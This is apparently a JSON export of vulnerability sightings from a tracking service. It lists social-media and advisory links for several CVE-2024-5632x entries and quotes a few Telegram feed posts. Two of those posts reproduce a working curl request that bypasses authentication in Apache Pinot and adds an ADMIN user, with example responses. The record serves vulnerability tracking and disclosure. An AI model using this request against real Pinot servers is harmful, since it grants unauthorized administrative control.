{"vulnerability": "CVE-2024-5632", "sightings": [{"uuid": "db23f6f3-5ff7-4e89-b659-df9ef6b46d18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681851388329044", "content": "", "creation_timestamp": "2024-12-19T22:29:51.145153Z"}, {"uuid": "5e059928-3141-4dcf-80d7-c47ebb56fa56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3ldoyum6vh72m", "content": "", "creation_timestamp": "2024-12-19T23:15:37.117919Z"}, {"uuid": "0aef700b-b125-4d65-a71b-6de73cf6017a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56329", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113686930684976106", "content": "", "creation_timestamp": "2024-12-20T20:01:34.934200Z"}, {"uuid": "8f2fccff-afb1-4c4f-8634-b4552fd5c1e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56329", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3ldr7cgknk72a", "content": "", "creation_timestamp": "2024-12-20T20:16:05.426025Z"}, {"uuid": "d28968b8-46e4-4563-bf4e-800e23c0a9e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113702928777162458", "content": "", "creation_timestamp": "2024-12-23T15:50:06.704230Z"}, {"uuid": "af9daae1-5786-4de8-a3ce-301ff03dcf80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://bsky.app/profile/gothburz.bsky.social/post/3lfpjgt3ndz2z", "content": "", "creation_timestamp": "2025-01-14T15:02:30.715640Z"}, {"uuid": "acdc0eaf-d677-4140-8286-05e5891daba0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823205947381993", "content": "", "creation_timestamp": "2025-01-13T21:38:13.192199Z"}, {"uuid": "81d70a7f-b9c5-4a3e-949f-7c097fa24a73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfnrbfzgav2h", "content": "", "creation_timestamp": "2025-01-13T22:17:19.454077Z"}, {"uuid": "007c203c-ffc3-452d-b5aa-74188de160d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56323", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lfnsgra5ei2y", "content": "", "creation_timestamp": "2025-01-13T22:38:13.792215Z"}, {"uuid": "c66074a1-ba5e-4b5b-ad24-58b5d64250ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56320", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765180178483233", "content": "", "creation_timestamp": "2025-01-03T15:41:27.472566Z"}, {"uuid": "5e5cd1a7-4f45-4b91-acae-20a9cfd7f860", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56321", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765203311496444", "content": "", "creation_timestamp": "2025-01-03T15:47:20.573030Z"}, {"uuid": "cc2828a1-9944-4b3e-bc69-c40d701cae49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56322", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765226599280497", "content": "", "creation_timestamp": "2025-01-03T15:53:18.294117Z"}, {"uuid": "2e1c3970-4106-4bfa-9c9b-4334a9864e67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56324", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113765249621753886", "content": "", "creation_timestamp": "2025-01-03T15:59:07.149063Z"}, {"uuid": "c5538a4e-55f6-4d58-9714-3a7655dca818", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56328", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947614956436564", "content": "", "creation_timestamp": "2025-02-04T20:57:01.326323Z"}, {"uuid": "000e5b73-4d87-49e9-ae82-2f4dc7ef1bac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/114103812642418026", "content": "", "creation_timestamp": "2025-03-04T11:00:09.277985Z"}, {"uuid": "f9e6cb66-24f4-475b-aeae-2229fc41406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3llnjekyxh226", "content": "", "creation_timestamp": "2025-03-31T04:27:09.066261Z"}, {"uuid": "5960382b-7195-4d20-8c08-94454ce7e6e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "http://www.zerodayinitiative.com/advisories/ZDI-25-109/", "content": "", "creation_timestamp": "2025-03-03T05:00:00.000000Z"}, {"uuid": "13507af6-3b2e-49a3-b065-963d6459f3a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56328", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhey4btmih2n", "content": "", "creation_timestamp": "2025-02-04T21:16:09.093865Z"}, {"uuid": "66cd981d-d331-41d5-ab74-f5ba764ef2ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56328", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhf3uwnz362r", "content": "", "creation_timestamp": "2025-02-04T22:23:43.865370Z"}, {"uuid": "42cbeb12-b2ef-47de-ab3d-8b8fb1197ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://vulnerability.circl.lu/comment/a9f2cad3-dbfc-4703-9c5f-9af054301f88", "content": "", "creation_timestamp": "2025-03-11T05:25:53.938762Z"}, {"uuid": "0cb2dc2b-af99-48a1-944d-35c401d5c014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-56325", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lk3kczpmgc27", "content": "", "creation_timestamp": "2025-03-11T07:31:00.897315Z"}, {"uuid": "47559415-ee1d-43d3-853f-33019e8b21be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llex5sozja2r", "content": "", "creation_timestamp": "2025-03-27T18:39:53.177535Z"}, {"uuid": "8600f9a0-5348-4dc9-9e62-799120b397db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114262869101590683", "content": "", "creation_timestamp": "2025-04-01T13:10:18.096768Z"}, {"uuid": "b2e2ba76-6802-4a18-a413-6faa89877407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114262869101590683", "content": "", "creation_timestamp": "2025-04-01T13:10:18.093633Z"}, {"uuid": "275142f2-e952-4d74-b6f8-e654b030b37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-56325.yaml", "content": "", "creation_timestamp": "2025-04-03T13:16:13.000000Z"}, {"uuid": "29ac1eb7-2b88-41a1-8efc-f015a6aa32e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llzctfed6c2p", "content": "", "creation_timestamp": "2025-04-04T21:02:08.920503Z"}, {"uuid": "94efbc0d-c553-48db-ae2f-2a8618c262d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmif532gvs2p", "content": "", "creation_timestamp": "2025-04-10T20:53:12.140118Z"}, {"uuid": "b642f794-db2c-4da8-98c5-cdd30ec0c7f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3m6mmbvm3sc2c", "content": "", "creation_timestamp": "2025-11-27T14:45:18.433016Z"}, {"uuid": "0d84828d-a8fd-4e58-9672-90dc7fded24c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lk34egd5mc2w", "content": "", "creation_timestamp": "2025-03-11T03:21:18.175758Z"}, {"uuid": "0af93022-602d-4194-baa4-fcf4f815f964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lk3qrtl7nar2", "content": "", "creation_timestamp": "2025-03-11T09:27:39.526456Z"}, {"uuid": "a3537656-601a-4f5b-af48-b26dd41d6919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmlupxwjxk24", "content": "", "creation_timestamp": "2025-04-12T06:10:15.134152Z"}, {"uuid": "9ae58492-33e4-4735-8221-272e0eb51f81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "MISP/acd0294c-4561-4286-a04e-5c02a1c67b1f", "content": "", "creation_timestamp": "2025-09-15T13:28:31.000000Z"}, {"uuid": "71516f29-ed4a-42a3-beac-d82e36da6fce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "MISP/acd0294c-4561-4286-a04e-5c02a1c67b1f", "content": "", "creation_timestamp": "2025-09-16T03:45:00.000000Z"}, {"uuid": "e11788f7-7e40-491f-92e6-c9e89baf2fe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "MISP/9ca82492-7deb-4197-a6f1-191e121eef96", "content": "", "creation_timestamp": "2025-08-25T13:32:04.000000Z"}, {"uuid": "a92eca59-6eb9-41cf-b2fa-a9d543047228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9868", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56325\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}  http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.\n\ud83d\udccf Published: 2025-04-01T09:07:14.185Z\n\ud83d\udccf Modified: 2025-04-01T09:07:14.185Z\n\ud83d\udd17 References:\n1. https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v", "creation_timestamp": "2025-04-01T09:32:42.000000Z"}, {"uuid": "32019c12-89b3-414a-bc15-c85496230203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "59a88e82-498b-4cdc-a2a7-3b40e6d7dc61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56328", "type": "seen", "source": "https://t.me/cvedetector/17251", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56328 - Discourse JavaScript Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-56328 \nPublished : Feb. 4, 2025, 9:15 p.m. | 2\u00a0hours, 7\u00a0minutes ago \nDescription : Discourse is an open source platform for community discussion. An attacker can execute arbitrary JavaScript on users' browsers by posting a maliciously crafted onebox url. This issue only affects sites with CSP disabled. This problem has been patched in the latest version of Discourse. Users are advised to upgrade. Users unable to upgrade should enable CSP, disable inline Oneboxes globally, or allow specific domains for Oneboxing. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"05 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-05T00:45:53.000000Z"}, {"uuid": "ce55d6e4-2ade-4872-9018-34ac4e93f742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56323", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1424", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56323\n\ud83d\udd39 Description: OpenFGA is an authorization/permission engine. IN OpenFGA v1.3.8 to v1.8.2 (Helm chart openfga-0.1.38 to openfga-0.2.19, docker v1.3.8 to v.1.8.2)  are vulnerable to authorization bypass under the following conditions: 1. calling Check API or ListObjects with a model that uses [conditions](https://openfga.dev/docs/modeling/conditions), and 2. calling Check API or ListObjects API with [contextual tuples](https://openfga.dev/docs/concepts#what-are-contextual-tuples) that include conditions and 3. OpenFGA is configured with caching enabled (`OPENFGA_CHECK_QUERY_CACHE_ENABLED`). Users are advised to upgrade to v1.8.3. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T21:33:30.556Z\n\ud83d\udccf Modified: 2025-01-14T00:29:58.019Z\n\ud83d\udd17 References:\n1. https://github.com/openfga/openfga/security/advisories/GHSA-32q6-rr98-cjqv", "creation_timestamp": "2025-01-14T01:07:30.000000Z"}, {"uuid": "81c2a461-a786-4c8a-b3ff-76797cc36071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/cvedetector/21746", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56325 - Apache Pinot Authentication Bypass\", \n  \"Content\": \"CVE ID : CVE-2024-56325 \nPublished : April 1, 2025, 9:15 a.m. | 2\u00a0hours, 12\u00a0minutes ago \nDescription : Authentication Bypass Issue  \n  \nIf the path does not contain / and contain., authentication is not required.  \n  \nExpected Normal Request and Response Example  \n  \ncurl -X POST -H \"Content-Type: application/json\" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}  http://{server_ip}:9000/users   \n  \n  \nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}  \n  \n  \nMalicious Request and Response Example   \n  \ncurl -X POST -H \"Content-Type: application/json\" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .  \n  \n  \nReturn: {\"users\":{}}  \n  \n  \n  \n   \n  \nA new user gets added bypassing authentication, enabling the user to control Pinot. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"01 Apr 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-04-01T13:37:52.000000Z"}]}